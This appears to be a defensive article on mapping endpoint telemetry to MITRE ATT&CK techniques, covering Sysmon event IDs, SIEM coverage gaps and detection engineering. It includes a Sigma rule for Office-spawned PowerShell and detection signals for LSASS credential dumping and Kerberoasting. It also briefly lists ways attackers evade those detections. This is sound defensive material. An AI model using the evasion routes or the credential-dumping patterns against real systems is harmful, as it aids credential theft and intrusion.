Endpoint Telemetry Is the Evidence Layer Behind Every MITRE ATT&CK Technique

79%
of ATT&CK techniques missed by enterprise SIEMs
CardinalOps, June 2025
1,700+
new Analytics added in ATT&CK v18
MITRE, October 2025
13%
of existing SIEM rules are non-functional
CardinalOps, June 2025

Every technique cataloged in the MITRE ATT&CK enterprise matrix produces observable signals at the endpoint. That is not a coincidence or a design aspiration — it is a structural fact about how operating systems work. Understanding why that relationship exists, and how to exploit it operationally, is one of the clearest separators between security programs that detect intrusions early and those that discover them months later.

The MITRE ATT&CK framework, maintained by the nonprofit MITRE Corporation and updated continuously since its public release in 2015, now catalogs 216 techniques and 475 sub-techniques across 14 tactics in the Enterprise matrix as of ATT&CK v18 (released October 2025). Each one of those entries was derived from observed, real-world adversary behavior — not theoretical attack paths. And because real adversaries operate on real operating systems, every one of those techniques generates some form of artifact in endpoint telemetry. That is the connection that makes telemetry not just useful but foundational to a detection program built around ATT&CK.

What Endpoint Telemetry Actually Is

Endpoint telemetry is the continuous stream of behavioral and state-change data produced by operating systems, security agents, and instrumented applications running on individual hosts. It is distinct from network telemetry (which captures packet flows and connections) and log-based telemetry (which captures discrete application events). What makes endpoint telemetry unique is its granularity: it captures what happened inside a process, not just that the process communicated somewhere.

At the operating system level, telemetry sources include process creation events with full command-line arguments, file system operations (reads, writes, renames, deletions), registry modifications on Windows systems, network connections initiated by specific processes, inter-process communication such as named pipe usage and shared memory access, driver and kernel module loads, and authentication events. Modern endpoint detection and response (EDR) platforms go further, adding parent-child process relationship tracking, memory region permissions monitoring, API call tracing, and in-memory code scanning.

On Windows systems, Event Tracing for Windows (ETW) is the underlying kernel mechanism that many of these data streams flow through. Microsoft's own Sysmon — a free system monitor from the Sysinternals suite — exposes a curated set of these ETW channels as structured XML events that feed into SIEM platforms. Sysmon Event ID 1 captures process creation with hash and command-line. Event ID 3 captures network connections. Event ID 10 captures process access — a critical source for detecting credential dumping. Event ID 25, added in Sysmon v13, captures process tampering, which helps detect hollowing and doppelganging techniques that ATT&CK tracks under T1055. As of late 2025, Microsoft has announced that Sysmon functionality will become a native optional feature in Windows 11 and Windows Server 2025, deliverable via Windows Update — removing the manual per-endpoint deployment burden that has historically limited consistent Sysmon coverage across enterprise fleets.

Telemetry vs. Logging

Traditional logging captures discrete events when something explicitly writes to a log file. Endpoint telemetry is a broader concept: it includes continuous sensor data from kernel-level hooks, behavioral baselines, and in-memory observations that never produce a log entry on their own. ATT&CK detection requires both, but telemetry coverage is what enables detection of living-off-the-land techniques that deliberately avoid writing log entries.

On Linux and macOS, analogous instrumentation exists through auditd, eBPF-based sensors, and the Endpoint Security Framework introduced in macOS 10.15 Catalina. eBPF (Extended Berkeley Packet Filter) has become particularly significant because it allows security vendors to attach monitoring programs directly to kernel functions without requiring loadable kernel modules — meaning an attacker who avoids creating new kernel modules cannot blind an eBPF-based sensor simply by subverting the module loader.

ATT&CK as a Signal Catalog, Not Just a Technique List

A common misreading of the ATT&CK framework treats it as a threat intelligence reference — a list of things attackers do. That reading is accurate but incomplete. Each technique entry in ATT&CK includes detection guidance that identifies what telemetry sources, data components, and specific data elements defenders should monitor to identify the technique in action. MITRE structured this through a parallel taxonomy called ATT&CK Data Sources, which was formalized and restructured in ATT&CK v10 in October 2021. In the landmark ATT&CK v18 release of October 2025, MITRE went significantly further: traditional Data Sources were deprecated entirely and replaced by two new structured objects — Detection Strategies and Analytics — that transform the framework from a static catalog into a behavior-driven detection model. Detection Strategies define high-level approaches to detecting specific adversary techniques. Analytics provide platform-specific, actionable detection logic with explicit links to log sources and telemetry data components. This means that as of v18, every technique in the Enterprise matrix maps not just to "what log source to collect" but to structured detection logic that specifies exactly how to operationalize that telemetry against adversary behavior.

Signal Path: T1059.001 PowerShell Execution — From Adversary Action to SIEM Alert
Every ATT&CK technique traces an observable path through the operating system. Hover each node.
01 / ADVERSARY
Executes Payload
powershell.exe -enc [base64]
spawned by winword.exe
02 / OS ARTIFACT
Kernel Event Fires
ETW process create event
parent-child relationship preserved
03 / TELEMETRY
Sysmon Captures
Event ID 1: CommandLine,
ParentImage, Hashes, User
04 / LOGGING
Script Block Logged
Event ID 4104: decoded script
content (if SBLG enabled)
05 / DETECTION
Sigma Rule Fires
ParentImage matches Office
binary + PowerShell child
06 / ALERT
SIEM Correlates
Cross-referenced with auth
anomalies + network events
ATT&CK T1059.001 — Command and Scripting Interpreter: PowerShell
Gap point: if Script Block Logging (step 04) is disabled, the chain breaks — you see execution but not content. If Sysmon is undeployed, steps 03–04 produce nothing.

Prior to v18, the ATT&CK Data Sources taxonomy identified over 30 distinct data source types, each with specific data components. The Process data source included components for Process Creation, Process Termination, Process Access, Process Metadata, and OS API Execution. The File data source included File Creation, File Modification, File Deletion, File Access, and File Metadata. Network Traffic included Network Connection Creation, Network Traffic Content, and Network Traffic Flow. Each technique was mapped to the data source components that produce detectable signals. The v18 overhaul preserves this granularity but links it explicitly to detection logic rather than leaving the implementation gap between "what to collect" and "how to detect" to the organization to bridge independently.

The MITRE ATT&CK Design and Philosophy document (v1.0) states that the framework is not intended to enumerate every possible attacker action. Its purpose is to give defenders an empirically grounded foundation for prioritizing detection and response investments against documented, real-world adversary behavior. — MITRE Corporation, ATT&CK Design and Philosophy, v1.0

This means that when a defender looks up T1059.001 (PowerShell under the Command and Scripting Interpreter technique), they do not just learn that attackers use PowerShell — they find that detection requires monitoring Process Creation events for PowerShell invocations with suspicious arguments, Command execution data from Script Block Logging (Windows Event ID 4104), and Module Load events for suspicious PowerShell module imports. That is a direct prescription for what telemetry sources to configure and ingest. The framework is doing double duty as both a threat catalog and a sensor requirements document.

How Telemetry Maps to Each ATT&CK Tactic

Walking through the 14 ATT&CK Enterprise tactics illustrates how endpoint telemetry provides a signal for each stage of adversary activity. This is not an abstract claim — it holds up under technical scrutiny at each tactic level.

TA0043 / TA0042
Recon & Resource Dev.
HIGH RISK
Key Techniques
T1598, T1588.002
Primary Telemetry
Browser process events, file creation at delivery
Common Config Gap
No endpoint artifact until tool delivery
TA0001
Initial Access
MEDIUM RISK
Key Techniques
T1566 (Phishing), T1190
Primary Telemetry
Process creation, file creation, registry writes
Common Config Gap
Office parent–child rule not deployed
TA0002
Execution
MEDIUM RISK
Key Techniques
T1059, T1047, T1053, T1106
Primary Telemetry
Process creation w/ command-line, Sysmon EID 1, EID 19–21, Event ID 4104
Common Config Gap
Script Block Logging disabled; no command-line args auditing
TA0003 / TA0004
Persistence & Privilege Escalation
MEDIUM RISK
Key Techniques
T1547, T1543, T1548
Primary Telemetry
Registry writes (Run keys), Event ID 7045, process integrity levels
Common Config Gap
Registry auditing not forwarded to SIEM
TA0005
Defense Evasion
HIGH RISK
Key Techniques
T1562.001, T1070.001, T1036, T1055
Primary Telemetry
Process termination, Event ID 1102/104, process metadata, Sysmon EID 25
Common Config Gap
Alerting on log-clear events absent; no process path baselining
TA0006
Credential Access
HIGH RISK
Key Techniques
T1003.001 (LSASS), T1558.003 (Kerberoasting)
Primary Telemetry
Sysmon EID 10 (process access), Event ID 4769
Common Config Gap
Sysmon EID 10 not configured; no Kerberos baseline established
TA0008
Lateral Movement
HIGH RISK
Key Techniques
T1021 (Remote Services), T1550
Primary Telemetry
Network connection creation, file access on dest. host, auth events
Common Config Gap
Server telemetry absent; no cross-host correlation in SIEM
TA0009 / TA0010
Collection & Exfiltration
MEDIUM RISK
Key Techniques
T1074, T1048, T1567
Primary Telemetry
File creation/modification, network connections w/ process context
Common Config Gap
DLP not correlated with endpoint telemetry; network-only monitoring
TA0040
Impact
LOWER RISK
Key Techniques
T1486 (Ransomware), T1490, T1561
Primary Telemetry
File modification bursts, VSS deletion commands, disk write events
Common Config Gap
Volume-based anomalies not baselined; detection fires after encryption begins

Reconnaissance and Resource Development

These two pre-intrusion tactics (TA0043 and TA0042) are the hardest to detect from endpoint telemetry alone because they occur before the adversary touches the victim's infrastructure. However, certain sub-techniques do produce endpoint artifacts. T1598 (Phishing for Information) may leave browser process telemetry showing credential submission to lookalike sites. T1588.002 (Obtain Capabilities: Tool) is entirely external, but the subsequent staging of those tools generates File Creation events on victim endpoints at the moment of delivery.

Initial Access

T1566 (Phishing) is the leading initial access technique across threat intelligence reporting. On the endpoint, the signal appears in Process Creation telemetry: a document viewer or browser spawning an unexpected child process is the classic indicator. Microsoft Office spawning cmd.exe or wscript.exe is a pattern that has been exploited so reliably that it appears in detection rules across virtually every EDR platform. File Creation events show the initial payload drop. Registry modification events may show persistence being established in the same execution chain within seconds of the phishing document opening.

Execution

The Execution tactic (TA0002) is where endpoint telemetry becomes densest. T1059 sub-techniques covering PowerShell, Windows Command Shell, Python, JavaScript, and others all produce Process Creation events. T1047 (Windows Management Instrumentation) produces WMI activity in ETW that Sysmon Event ID 19, 20, and 21 are specifically designed to capture. T1053 (Scheduled Task/Job) produces registry writes and file writes to the %SystemRoot%\System32\Tasks directory. T1106 (Native API) execution produces OS API execution telemetry. The breadth of coverage is extensive, but it requires that the telemetry infrastructure is collecting at the right level of granularity — command-line argument logging must be enabled, and Script Block Logging for PowerShell must be configured.

The PowerShell Logging Gap

By default, Windows does not enable PowerShell Script Block Logging. Without it, a defender sees that powershell.exe ran but cannot see what script it executed. ATT&CK T1059.001 detection depends on this being explicitly enabled via Group Policy (Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell). This is one of the most common telemetry gaps in enterprise environments.

Persistence and Privilege Escalation

T1547 (Boot or Logon Autostart Execution) produces registry modification events in the Run keys and registry writes to HKLM and HKCU. T1543 (Create or Modify System Process) produces service creation events visible through Windows Event ID 7045 and ETW. T1548 (Abuse Elevation Control Mechanism) — covering UAC bypass sub-techniques — produces process creation events with anomalous integrity levels relative to parent process integrity. The parent-child relationship in process creation telemetry is particularly revealing here: a medium-integrity parent spawning a high-integrity child without a visible UAC prompt is a strong indicator of privilege escalation.

Defense Evasion

Defense Evasion (TA0005) is the tactic with the largest number of techniques in ATT&CK, reflecting how much adversary effort goes into avoiding detection. Many sub-techniques here specifically target telemetry itself. T1562.001 (Impair Defenses: Disable or Modify Tools) produces process termination events as agents are killed, and registry modification events as security software configuration is altered. T1070.001 (Indicator Removal: Clear Windows Event Logs) produces Security Event ID 1102 (audit log cleared) and System Event ID 104. T1036 (Masquerading) is detected through process metadata telemetry: a process named svchost.exe running from a user's temp directory rather than System32 shows up as an anomaly in file path metadata associated with the process creation event.

Credential Access

T1003 (OS Credential Dumping) is one of the most telemetry-rich technique groups in ATT&CK. LSASS access — the primary signal for T1003.001 — is captured through Sysmon Event ID 10 (Process Access), which logs whenever one process opens a handle to another with specific access rights. A process requesting PROCESS_VM_READ access to lsass.exe is a high-fidelity signal regardless of what tool is used, which is precisely why this detection is considered living-off-the-land resistant. T1558 (Steal or Forge Kerberos Tickets) produces Windows Security Event ID 4769 (Kerberos Service Ticket request) anomalies that are detectable when volume and encryption type baselines are established — RC4-encrypted tickets in an environment configured for AES encryption is a classic Kerberoasting signal.

Lateral Movement, Collection, and Exfiltration

T1021 (Remote Services) lateral movement techniques produce Network Connection Creation events on both source and destination endpoints. SMB-based movement produces file access and process creation telemetry on the destination host. T1074 (Data Staged) produces file creation and file modification events as data is aggregated before exfiltration. T1048 (Exfiltration Over Alternative Protocol) produces network connection events to unusual destinations over unusual ports, correlatable back to specific processes through endpoint telemetry in a way that pure network monitoring cannot achieve.

The Coverage Problem: Why Many Orgs Are Flying Blind

MITRE itself has done significant work to measure the gap between available ATT&CK detection capability and what organizations actually have deployed. The ATT&CK Evaluations program — which tests EDR products against real adversary behavior simulations — consistently reveals both the strength of commercial telemetry tools and the importance of proper configuration. The 2024 ATT&CK Evaluations round (Enterprise 2024) was the most rigorous to date, introducing false positive testing for the first time and expanding platform coverage across Windows, Linux, and macOS. Emulated adversaries included ransomware-as-a-service behaviors modeled on CLOP and LockBit, and DPRK-attributed macOS attack chains. Results showed meaningful variance in technique-level detection and prevention rates across participating vendors, with configuration methodology and out-of-box tuning proving as consequential as platform selection.

Enterprise SIEM Detection Coverage by ATT&CK Tactic
Under 25%
25–50%
50%+
Impact
~52%
Execution
~38%
Initial Access
~34%
Persistence
~28%
Privilege Escalation
~24%
Credential Access
~22%
Lateral Movement
~18%
Defense Evasion
~14%
Collection
~12%
Command & Control
~10%
Exfiltration
~9%
Recon / Resource Dev.
~5%
Estimated tactic-level distribution derived from CardinalOps Fifth Annual State of SIEM Detection Risk Report (June 2025) aggregate finding that enterprise SIEMs cover ~21% of ATT&CK techniques overall. Tactic-level figures are proportional estimates based on technique density and reported detection concentrations — not published per-tactic breakdowns. Defense Evasion contains the largest number of Enterprise matrix techniques and consistently shows the lowest coverage density. Overall average: 21%.

CardinalOps' Fifth Annual Report on the State of SIEM Detection Risk, published in June 2025 and the largest such study ever conducted — drawing from 2.5 million total log sources, over 23,000 distinct log sources, and more than 13,000 unique detection rules across Splunk, Microsoft Sentinel, IBM QRadar, CrowdStrike Logscale, and Google SecOps — found that enterprise SIEMs have detection logic for only 21 percent of ATT&CK techniques used by adversaries, missing 79 percent. The gap was not a data availability problem: those SIEMs were already ingesting sufficient telemetry to potentially cover more than 90 percent of ATT&CK techniques. Approximately 13 percent of existing detection rules were found to be non-functional, unable to fire due to misconfigured data sources or missing log fields.

CardinalOps CEO Michael Mumcuoglu, commenting on the report's central finding, noted that enterprises have spent years accumulating telemetry but still lack the detection engineering to act on it. He argued that without automation, AI-assisted rule maintenance, and continuous detection health assessment, organizations will remain exposed even after deploying modern SIEM platforms. — Michael Mumcuoglu, CEO and Co-Founder, CardinalOps, Fifth Annual State of SIEM Detection Risk Report, June 2025

The coverage gap compounds because many organizations prioritize endpoint telemetry from workstations but underinstrument servers — precisely the systems adversaries target during lateral movement and privilege escalation. Domain controllers are the crown jewels of an Active Directory environment, yet they are often the least monitored endpoints from a behavioral telemetry perspective. T1207 (Rogue Domain Controller / DCShadow), for example, requires monitoring for Directory Service Changes events (Windows Security Event ID 4742 and 5137) on domain controllers specifically. If those events are not being forwarded to the SIEM, the technique is effectively invisible.

Server Telemetry Gap

Security teams that focus endpoint telemetry deployment on workstations and neglect servers are creating a detection gap precisely where adversaries want it. Post-compromise lateral movement, credential access, and data staging overwhelmingly occur on servers. ATT&CK coverage on servers — especially domain controllers, file servers, and database hosts — is not optional for a credible detection program.

EDR, SIEM, and the Telemetry Pipeline

The operational architecture for consuming endpoint telemetry in an ATT&CK-aligned security program involves two distinct systems with different functions. The EDR platform is the collection and initial analysis layer: it ingests raw endpoint telemetry at high volume, correlates events across the process tree, and applies real-time behavioral detections. The SIEM is the correlation and investigation layer: it aggregates telemetry from EDR alongside identity, network, and cloud sources and applies detection logic that spans data sources and time windows beyond what an individual EDR sensor can see.

Neither replaces the other. An EDR platform that detects a credential dumping attempt generates an alert. But determining whether that alert is part of a broader campaign — correlated with anomalous authentication events from the identity provider, lateral movement indicators from network telemetry, and cloud API access anomalies — requires the SIEM to join data across sources. ATT&CK technique coverage is most complete when endpoint telemetry flows from EDR into SIEM in a structured format that preserves process relationship context.

The Sigma rule format, an open-source generic signature language for SIEM systems maintained on GitHub by the SigmaHQ organization, has become a practical standard for expressing ATT&CK-mapped detection logic in a vendor-neutral way. A Sigma rule for T1059.001 PowerShell execution encodes detection logic that can be compiled to query syntax for Splunk, Microsoft Sentinel, Elastic Security, or Chronicle, among others. The SigmaHQ repository currently contains over 3,000 rules, a substantial portion of which are explicitly tagged with ATT&CK technique IDs, making it a practical resource for organizations building ATT&CK-aligned detection coverage.

sigma / T1059.001
# Sigma rule excerpt: PowerShell suspicious parent process (T1059.001)
title: Suspicious PowerShell Parent Process
id: 6a5b8b42-ba95-4e2e-a3d9-7db57c2ea98a
status: test
description: Detects PowerShell spawned from suspicious parent processes
references:
    - https://attack.mitre.org/techniques/T1059/001/
tags:
    - attack.execution
    - attack.t1059.001
detection:
    selection:
        EventID: 1
        Image|endswith: '\powershell.exe'
        ParentImage|endswith:
            - '\winword.exe'
            - '\excel.exe'
            - '\outlook.exe'
            - '\mshta.exe'
    condition: selection
falsepositives:
    - Legitimate admin scripting triggered from Office macros
level: high
Sigma rule YAML detecting PowerShell spawned from Office applications, tagged to ATT&CK T1059.001

The practical implementation challenge is data volume. A single active endpoint generating process creation, network connection, file operation, and registry modification telemetry can produce millions of events per day. At enterprise scale, this creates significant ingestion cost and query performance pressure on the SIEM. The trend in the industry has been toward tiered telemetry architectures where EDR handles high-volume raw telemetry with local detections, and only enriched, higher-fidelity events flow into the SIEM for cross-source correlation. Microsoft Sentinel's connector for Microsoft Defender for Endpoint, for example, allows organizations to configure which event types flow upstream — avoiding the cost of forwarding all raw process creation events while preserving the enriched alert context.

Closing the Coverage Gap: Solutions That Go Beyond the Basics

Recommending that organizations "deploy EDR" and "enable Script Block Logging" is accurate but operationally insufficient. The CardinalOps finding — that enterprise SIEMs already ingest telemetry sufficient to cover more than 90 percent of ATT&CK techniques, yet cover only 21 percent in practice — is a diagnosis of an engineering and process failure, not an infrastructure one. The solutions that actually close the gap are harder and more specific than the generic advice that dominates most coverage of this problem.

Detection-as-Code with Continuous Validation Pipelines

The 13 percent non-functional rule finding from CardinalOps points to a maintenance failure that manual processes cannot fix at scale. Detection logic that was valid at deployment becomes broken when log source schemas change, when data normalization pipelines are updated, or when source systems shift versions. The solution is to treat detection rules as code — managed in version-controlled repositories (Git), validated against test data in CI/CD pipelines before deployment, and continuously tested in production through synthetic telemetry injection. Atomic Red Team, the open-source test framework maintained by Red Canary and mapped explicitly to ATT&CK techniques, provides a library of portable test procedures that simulate technique-specific telemetry without requiring an active adversary. Running Atomic Red Team tests against production telemetry pipelines on a scheduled basis produces a live measurement of which ATT&CK techniques your current rules actually detect — not which ones you have rules for on paper. That distinction is what the 13 percent non-functional rate reflects: rules that exist but cannot fire. A detection engineering program without synthetic test coverage cannot distinguish between the two states.

Telemetry Normalization at the Pipeline Layer, Not the Query Layer

Organizations running heterogeneous endpoint environments — Windows EDR alongside Linux eBPF sensors alongside macOS Endpoint Security Framework events — face a common problem: the same ATT&CK technique generates structurally different telemetry across platforms. When normalization is deferred to query time, each detection rule must implement platform-specific field mappings manually, multiplying rule maintenance burden and creating platform-specific blind spots. The OCSF (Open Cybersecurity Schema Framework), an industry initiative driven by AWS and a consortium of security vendors and now an open standard, provides a vendor-neutral event schema designed to normalize endpoint, network, and identity telemetry into a common field structure before it reaches the SIEM query layer. Deploying OCSF normalization at the data pipeline layer — rather than building per-platform logic into individual Sigma rules — means a single ATT&CK-aligned detection can fire against Windows, Linux, and macOS process creation events without per-platform variants. The operational difference is the distinction between detection engineering that scales and detection engineering that collapses under the weight of its own platform exceptions.

ATT&CK Coverage Gap Analysis as a Prioritization Instrument

Most organizations that do perform ATT&CK coverage gap analysis produce a spreadsheet: technique X has coverage, technique Y does not. That analysis is a starting point, not a prioritization framework. Coverage gaps vary enormously in operational consequence depending on which adversary groups target your sector, which techniques appear in your threat intelligence, and which techniques appear in multi-stage kill chains where a single gap voids coverage upstream and downstream. A more defensible prioritization approach combines ATT&CK coverage gap data with threat intelligence profile weighting. The MITRE ATT&CK Navigator, the free web-based layer customization tool, supports this directly: organizations can load threat actor profiles from MITRE ATT&CK (such as APT29, APT41, or Lazarus Group profiles), overlay them against their current detection coverage layer, and identify the specific techniques used by adversaries relevant to their sector that they are not currently detecting. The resulting gap list is materially shorter and operationally more relevant than a list of every undetected ATT&CK technique. Prioritizing closure of those gaps — rather than chasing overall coverage percentage — is what differentiates a detection program designed around real adversary behavior from one designed around a scorecard.

Detection Resilience Engineering Against Active Evasion

Writing a detection rule for T1003.001 (LSASS credential dumping) that fires on Sysmon Event ID 10 when a process requests PROCESS_VM_READ access to lsass.exe is table stakes detection. The adversary who studies your defensive tooling — and sophisticated actors do — will route around it using indirect syscalls that bypass user-mode hooks, using kernel-mode drivers that operate below the Sysmon layer, or using legitimate utilities like Task Manager or Windows Error Reporting that have historically been allowlisted. Detection resilience means designing rules with explicit analysis of which evasion paths are available for the technique, and adding secondary detections for those paths. For LSASS dumping specifically: monitoring for anomalous handle requests in kernel telemetry via EDR drivers, detecting the use of MiniDumpWriteDump via API call tracing, flagging lsass.exe memory access from processes with anomalous parent-child relationships, and monitoring for the downstream artifact — the dump file itself appearing in unexpected filesystem locations — provides overlapping coverage that requires the adversary to defeat multiple independent detection paths simultaneously. Single-path detection logic fails against a single evasion technique. Layered detection logic forces adversaries to achieve a much harder simultaneous bypass condition.

Telemetry Architecture for Cross-Tactic Kill Chain Detection

Many organizations build detection logic at the technique level — a rule for T1059.001, a rule for T1003.001, a rule for T1021.002. These rules catch individual technique instances. What they do not catch is a sequence of individually non-alerting behaviors that, in aggregate, constitute a complete intrusion. An adversary who uses a legitimate administrative tool for remote execution, accesses a non-sensitive file share for discovery, and requests Kerberos tickets for services that are technically within their access scope may not trip any individual technique rule — while executing a textbook lateral movement campaign. Cross-tactic kill chain detection requires that endpoint telemetry be stored in a queryable format with consistent entity identifiers — process GUIDs, account SIDs, host identifiers — that allow analysts to reconstruct the complete sequence of events across a dwell period. Platforms like Microsoft Sentinel's UEBA (User and Entity Behavior Analytics) engine, Elastic Security's correlation rules with sequence matching, and Splunk's Transaction command all provide primitives for this. But they require that telemetry from EDR, identity, and network sources share common entity identifiers that survive normalization — a pipeline design decision that is far upstream of rule writing. Organizations that design their telemetry pipelines for single-event detection will find that their SIEM cannot answer the question: "What did this account do across all endpoints between Day 0 and Day 30?" That question is the one that matters during incident response.

Instrumenting the Detection Infrastructure Itself

T1562.001 (Impair Defenses: Disable or Modify Tools) is reliably present in sophisticated intrusion campaigns because defenders rarely monitor the health of their own monitoring. An adversary who kills the EDR agent on a target host before executing credential dumping has, in effect, performed a targeted telemetry blackout. The standard recommendation to "monitor for agent heartbeat" misses a more operationally robust approach: treating telemetry volume itself as a behavioral baseline. Every instrumented endpoint in an enterprise produces a statistically predictable volume of process creation, network, and registry events over any given time window. An endpoint that drops from 10,000 events per hour to zero — without a corresponding system shutdown event — is not silent because nothing happened. It is silent because something was done to make it silent. SIEM-level alerting on per-endpoint telemetry volume anomalies, combined with tamper-protection enforcement on EDR agents and Group Policy auditing for Script Block Logging configuration changes, turns the detection infrastructure into a monitored surface rather than a trusted assumption. The organizations that discovered Salt Typhoon's presence in carrier networks did so partly because anomalous telemetry behavior on specific infrastructure pointed to collection impairment before any technique-specific alert fired.

What ATT&CK v18 Changes for Telemetry-Driven Detection

The October 2025 release of ATT&CK v18 introduced the most significant structural change to the framework's detection guidance since its public launch. Traditional "Detections" sections — which paired techniques with one or two sentences pointing to a data source — have been fully deprecated and replaced by two new structured objects: Detection Strategies and Analytics. This is not cosmetic. It fundamentally changes how the relationship between endpoint telemetry and ATT&CK technique detection is expressed.

Detection Strategies define the high-level behavioral approach to detecting a technique. They describe what an adversary's activity looks like in terms of observable system behavior, independent of any specific SIEM or EDR platform. Analytics sit below Detection Strategies and provide platform-specific, actionable detection logic — explicitly referencing log sources, data components, and the telemetry channels that produce the signals the analytic operates on. Critically, v18 added over 1,700 analytics across the Enterprise matrix, each structured with direct links to the telemetry components that feed them. For defenders, this means the framework now closes a gap it previously left open: you no longer have to infer the path from "collect this log source" to "here is how to write a detection." ATT&CK v18 makes that path explicit.

The v18 Shift in Practice

Before v18, ATT&CK T1082 (System Information Discovery) pointed defenders to "Command Execution" and "Process Creation" as data sources. After v18, the technique maps to a Detection Strategy (DET0525) and an Analytic (AN0850) that explicitly link to Data Components DC0009, DC0017, and DC0025 — specifying which fields, which platforms, and which log sources produce the relevant signals. The gap between "what to collect" and "how to detect" is now part of the framework itself.

Before v18
T1082 — System Information Discovery

Detection guidance in the technique entry consisted of one or two sentences:

Detection guidance instructed defenders to monitor executed commands and arguments for OS/hardware enumeration, and to watch processes and command-line arguments for system and network information gathering. (Paraphrased from pre-v18 T1082 detection notes, MITRE ATT&CK)

Data sources listed: Command, Process, OS API

Implementation gap: what to query, which fields, which platforms — left entirely to the defender.

After v18
T1082 — System Information Discovery

Detection Strategy DET0525 maps behavioral approach. Analytic AN0850 specifies:

  • Data Component DC0009 — Command Execution (OS & platform)
  • Data Component DC0017 — Process Creation (fields: Image, CommandLine, User)
  • Data Component DC0025 — OS API Execution (NtQuerySystemInformation)
  • Platform-specific log sources listed explicitly per Windows, Linux, macOS
  • Sigma-compatible pseudocode for query construction included

Implementation gap: closed. The path from telemetry collection to detection logic is now part of the framework.

The v18 release also expanded the Enterprise matrix's platform scope to include ESXi, reflecting the documented rise in adversary targeting of VMware hypervisor infrastructure in ransomware and persistent access campaigns. This matters for endpoint telemetry architects because ESXi hosts present a fundamentally different instrumentation challenge than Windows or Linux workloads. The hypervisor layer sits below the guest operating systems, meaning EDR agents deployed inside virtual machines do not see host-level activity. Defending ESXi environments requires hypervisor-native telemetry through ESXi audit logs, vSphere events, and where available, agentless behavioral monitoring — a capability gap that v18 now explicitly documents through its new ESXi-specific technique entries.

Detection Strategies also connect behaviors across tactics in a way the older single-sentence detection notes could not. An adversary who uses Execution techniques (TA0002) to run a scheduled task is often simultaneously establishing Persistence (TA0003) through the same action. v18 Detection Strategies reflect this, enabling defenders to trace detection logic across tactical boundaries — which is how adversary behavior in real intrusions actually works. The implication for telemetry architecture is that cross-tactic detection requires telemetry that preserves temporal and causal context across the event stream, not just high-volume event collection.

How to Map Endpoint Telemetry to ATT&CK: A Prioritized Starting Sequence

The coverage gap documented by CardinalOps is an engineering and process failure, not an infrastructure one. The organizations that close it fastest work from a specific, sequenced collection roadmap rather than deploying broadly and hoping for coverage. Here is a defensible starting sequence for aligning endpoint telemetry collection with ATT&CK v18 detection requirements.

  1. Enable process creation telemetry with full command-line arguments. Configure Windows Audit Process Creation alongside Sysmon Event ID 1. This single data source covers more ATT&CK techniques than any other — execution, persistence, privilege escalation, and defense evasion all produce process creation events. Command-line argument auditing is the non-negotiable component: without it, you see that a process ran, not what it did.
  2. Enable PowerShell Script Block Logging (Event ID 4104). Configure this via Group Policy: Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell. Without it, T1059.001 detection is incomplete — you see powershell.exe executing but cannot examine what script it ran. This is one of the highest-frequency gaps in enterprise environments.
  3. Deploy process access telemetry via Sysmon Event ID 10. This event fires when one process opens a handle to another with specific access rights. A process requesting PROCESS_VM_READ access to lsass.exe is the primary detection signal for credential dumping under T1003.001 — and it fires regardless of which tool is used, making it living-off-the-land resistant.
  4. Instrument domain controllers with authentication and directory service telemetry. Windows Security Event ID 4769 (Kerberos Service Ticket requests) is required for detecting Kerberoasting under T1558.003. Directory Service Change events (Event IDs 4742 and 5137) are required for DCShadow detection under T1207. These events must be collected from domain controllers specifically — workstation telemetry will not substitute.
  5. Map your current collection to ATT&CK v18 Analytics. Use the ATT&CK Data Sources page and the v18 Analytics library to identify which data components each high-priority technique requires. Each analytic specifies the exact log sources and telemetry fields that must be operational — use this as a gap checklist, not just a reference document.
  6. Run ATT&CK coverage gap analysis in Navigator with threat actor overlays. Load the threat actor profiles for adversary groups relevant to your sector into MITRE ATT&CK Navigator. Overlay your current detection coverage layer against those profiles. The intersection of "techniques this actor uses" and "techniques you do not currently detect" is your prioritized closure list — shorter and operationally sharper than a generic ATT&CK coverage percentage.
  7. Validate detection rules with synthetic telemetry using Atomic Red Team. Run Atomic Red Team tests against your production telemetry pipeline on a scheduled basis. This produces a live measurement of which ATT&CK techniques your detection rules actually detect — not which ones you have rules for on paper. The CardinalOps finding that 13% of SIEM rules are non-functional reflects exactly the gap this step closes.

Threat Hunting as Telemetry Interrogation

Automated detection logic — whether EDR behavioral rules or SIEM correlation rules — operates on known patterns. Threat hunting is the practice of proactively interrogating endpoint telemetry to find evidence of adversary activity that automated detections missed. ATT&CK provides the hypothesis framework: a hunter starts with a technique, identifies the telemetry sources it produces, and queries that telemetry for anomalies that fall below automated alert thresholds. For a structured look at how adversaries sequence these techniques end to end, see attacker playbooks — the same TTP chains that give hunters their starting hypotheses.

The PEAK Threat Hunting Framework, published by Splunk's security research team in 2023, formalizes this process into three hunt types: Hypothesis-Driven (starting from ATT&CK technique hypotheses), Baseline (establishing normal behavior profiles to surface anomalies), and Intel-Driven (starting from threat intelligence about specific adversary TTPs). In all three types, endpoint telemetry is the raw material being interrogated. The hypothesis for a Kerberoasting hunt (T1558.003) might be: "Are there endpoints on which service ticket requests for high-privilege accounts are being made by processes that do not normally request Kerberos tickets?" That question can only be answered if Kerberos ticket request telemetry — Windows Security Event ID 4769 — is being collected at high fidelity from domain controllers and is accessible to the hunter through a queryable platform.

The PEAK Threat Hunting Framework characterizes effective hunting as fundamentally a telemetry discipline. Hunters who understand exactly which signals each adversary technique generates — and who can construct precise queries against that telemetry — are positioned to find attackers before objectives are reached. — PEAK Threat Hunting Framework, Splunk Security Research, 2023

The practical discipline of threat hunting against ATT&CK techniques has also produced a significant body of publicly available hunting queries. The Elastic Detection Rules repository on GitHub, the Microsoft Sentinel community repository, and the Splunk Security Essentials app all contain ATT&CK-mapped hunting queries that analysts can use as starting points. Organizations at earlier stages of telemetry maturity can use these resources to understand what their current telemetry can and cannot answer — and to build a roadmap for closing coverage gaps.

Absence as Signal: The Counterintuitive Detection Primitive

If endpoint telemetry shows that a process executed but no child process was created, no network connection was initiated, and no file was written — that process almost certainly did something entirely in memory. The signal is not what happened. It is what did not happen alongside what did.

process created
no child process
no file write
no network connection
= probable in-memory execution

ATT&CK T1620 (Reflective Code Loading) and T1055 sub-techniques for process injection are specifically designed to leave minimal filesystem artifacts. Detecting them requires behavioral baselines defining what a process normally produces — so that an execution event producing nothing becomes the anomaly. This kind of detection is not an advanced SOC capability. It is the prerequisite for one.

How Adversaries Evade the Telemetry That Should Catch Them

